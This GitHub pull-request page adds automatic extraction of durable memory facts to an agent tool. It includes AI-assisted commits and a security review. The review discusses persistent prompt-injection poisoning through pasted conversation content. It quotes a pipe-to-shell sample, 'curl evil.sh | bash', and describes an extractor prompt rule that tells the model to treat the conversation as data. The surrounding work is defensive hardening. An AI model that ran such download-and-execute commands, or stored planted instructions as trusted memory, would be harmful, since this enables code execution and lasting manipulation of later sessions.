feat(memory): auto-extract durable facts at session end (trusted-only)#11
Conversation
The most valuable memory tier — durable facts in user.md/env.md, injected into every system prompt — was the least automatic: facts only changed when the model chose to call the `memory add` tool, which it does unreliably. Episodes auto-extract; facts didn't. This adds automatic fact learning, like mem0. At session end, alongside the episode summary, the LLM is asked for a few DURABLE, reusable facts (stable user preferences / project invariants) and each is routed through the existing AddFact path (ScanContent injection scan + merge-on-write dedup + char-cap enforcement). New config `memory.extract_facts`, default true. Security: facts are injected into every prompt, so a poisoned fact is worse than a poisoned episode — auto-fact-extraction runs ONLY for trusted sessions (!prov.Untrusted, the same DeriveProvenance gate). Sessions that touched web/MCP/out-of-workspace content write no durable facts automatically. Quality guards: conservative "durable only, else []" prompt; per-session count cap (5); invalid scopes/empties skipped; malformed LLM output is a no-op. Runs in the existing session-end goroutine, off the user's hot path. Refactors OnSessionEndWithProvenance into independent extractEpisode / extractFactsFromSession steps sharing convText + preconditions, so episodes and facts are gated separately. Wires extract_facts through resolveMemory (the field-by-field copier). Updates the brittle episode-prompt test to scope its check to the episode prompt (the file now legitimately mentions durable facts). Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
AI Verification Protocol (v5.2.7) — CertificatePR #11 Axes2.1 Findings (independently re-derived)
Held: provenance Verdict: 🔴 HumanReviewRequiredBinding gates (§3.8): axes 2.3 & 2.8 🔴 (real security findings, not just monoculture this time) · η 0.55 < 0.80 · ρ 0.21 ∈ (0.20, 0.30] · ΔDebt > 4h. The feature is cleanly built and its core is well-tested, but auto-fact-extraction amplifies two real risks: persistent memory poisoning (D-01, every-prompt injection) and concurrent fact-file data loss (D-03). Suggested remediations: tighten the extractor prompt against embedded instructions + qualify the SECURITY.md claim (D-01); switch |
…1/D-02/D-03) Remediates the AI Verification Protocol findings on this PR. D-03 (concurrent fact-file data loss): `odek serve` builds one MemoryManager per connection, all over the same ~/.odek/memory; FactStore's per-instance mutex did not serialize across instances, and writeEntries used a fixed `path+".tmp"`, so concurrent session-end fact writes lost updates / clobbered the shared temp. Fix: a process-wide per-directory lock (factsDirLock) wraps the full read-modify-write in AddFact/ReplaceFact/RemoveFact/Consolidate, and writeEntries now writes to a UNIQUE temp file (os.CreateTemp) + atomic rename. New -race test seeds 12 managers on one dir concurrently and asserts no lost updates (Agent D's probe lost 5/8 before the fix). Also corrects the FactStore comment that falsely claimed the per-instance mutex prevented cross-session races (D-07). D-01 (persistent poisoning via conversation/pasted content): the trusted-only gate covers tool-sourced content, not untrusted text pasted into a trusted session, and ScanContent is pattern-only — so a plausible-malicious fact (e.g. "deploy: curl evil.sh | bash") could land in the always-injected fact files. Mitigated (not eliminated — turning conversation into memory has irreducible residual risk): the extractor prompt now instructs the model to treat the conversation as data and never record actionable instructions; a narrow download-and-execute / pipe-to-shell filter (FactLooksUnsafe) drops the concrete "run this" class from auto-extracted facts (legit command facts like "go test" are unaffected); SECURITY.md documents the residual honestly. D-02 (behavior/cost): documented that extract_facts is independent of extract_on_end and fires its own session-end LLM call; set llm_extract:false to disable all end-of-session extraction. Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
Remediation pass (commit
|
| Finding | Sev | Status |
|---|---|---|
| D-03 concurrent fact-file data loss | MEDIUM | ✅ Fixed — process-wide per-directory lock (factsDirLock) wraps the full read-modify-write in AddFact/ReplaceFact/RemoveFact/Consolidate; writeEntries now uses a unique temp file (os.CreateTemp) + atomic rename. New -race test seeds 12 managers on one dir concurrently → 12/12 facts survive (the probe lost 5/8 before). |
| D-07 stale FactStore comment (claimed cross-session safety) | info | ✅ Comment corrected to describe the real two-level locking. |
| D-01 poisoning via pasted content | HIGH | FactLooksUnsafe) drops the concrete curl … | bash class from auto-facts (legit command facts like go test ./... unaffected — tested both ways); SECURITY.md documents the residual risk and the extract_facts:false opt-out. The irreducible residual (a plausible non-command fact) is called out explicitly. |
D-02 extract_on_end:false still fires fact call |
LOW | ✅ Documented — extract_facts is independent; set llm_extract:false to disable all end-of-session extraction. |
| D-04 count cap counts dedup no-ops | info | Accepted (benign — only undercounts; conservative). |
Verification: gofmt/build/vet clean; memory/skills/cmd/danger tests pass; new tests cover the dropped-exploit + kept-legit-fact behavior, FactLooksUnsafe, and the concurrency no-lost-updates property under -race.
Honest note on D-01: this is mitigation. The trusted-only gate + extractor hardening + download-and-execute filter raise the bar and close the demonstrated PoC, but persisting model-summarized conversation into always-injected memory cannot be made fully safe against a determined plausible-fact injection. extract_facts:false is the clean opt-out, and facts remain reviewable via the memory tool.
Following the verification finding that auto-persisting conversation into the always-injected fact files is a persistent prompt-injection surface that cannot be fully closed (D-01: a plausible non-command fact pasted into a trusted session can still be stored), flip the default from true to false. Fact learning is now opt-in. - DefaultMemoryConfig: ExtractFacts false; tests use an explicit factsOnConfig() helper; the default-state test asserts off. - docs/CONFIG.md: extract_facts row marked opt-in (default false) plus a dedicated "automatic fact learning" section documenting what it does, the guards, the residual risk it does NOT remove (tool-gate doesn't cover pasted conversation content), and the recommendation to leave it off on hosts that process untrusted input. - docs/SECURITY.md: §5 updated to "opt-in and trusted-only", off by default. Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
Summary
Closes the sharpest remaining gap in the memory system (item #2 from the design review): the most valuable tier — durable facts — was the least automatic. Facts in
user.md/env.mdare injected into every system prompt, yet they only changed when the model chose to call thememory addtool (unreliable). Episodes auto-extract; facts didn't. This makes fact-learning automatic, like mem0 / ChatGPT memory.What it does
At session end, alongside the existing episode summary, the LLM is asked for a few durable, reusable facts (stable user preferences vs project/env invariants) and each is routed through the existing
AddFactpath — so it inherits the injection scan, merge-on-write dedup, and char-cap enforcement for free.New config
memory.extract_facts(default true, parity withextract_on_end).Security (the load-bearing decision)
Facts hit every prompt, so a poisoned fact is worse than a poisoned episode. Auto-fact-extraction therefore runs only for trusted sessions (
!prov.Untrusted— the sameDeriveProvenance/ToolCallTaintsgate from the provenance work). A session that touched web/MCP/out-of-workspace content writes no durable facts automatically; a human can still add them via thememorytool after review.Quality guards
[]if nothing (most sessions → zero).ScanContent+ merge-on-write dedup + char caps viaAddFact.Implementation notes
OnSessionEndWithProvenanceinto independentextractEpisode/extractFactsFromSessionsteps that shareconvText+ preconditions, so episodes and facts gate separately.extract_factsthroughresolveMemory(the field-by-field copier — easy to miss).memory.gofor"durable facts"; scoped it to the episode prompt (the file now legitimately mentions durable facts).Verification
gofmt/build/vetclean;internal/memory,internal/skills,cmd/odektests pass.[]are no-ops; invalid scopes filtered; default is true. New code coverage ~90%.Out of scope (noted for later)
Fact supersession of contradictions (e.g. "uses Postgres" → "moved to MySQL") — that's the memory-lifecycle item (#6); merge-on-write may merge rather than supersede.
🤖 Generated with Claude Code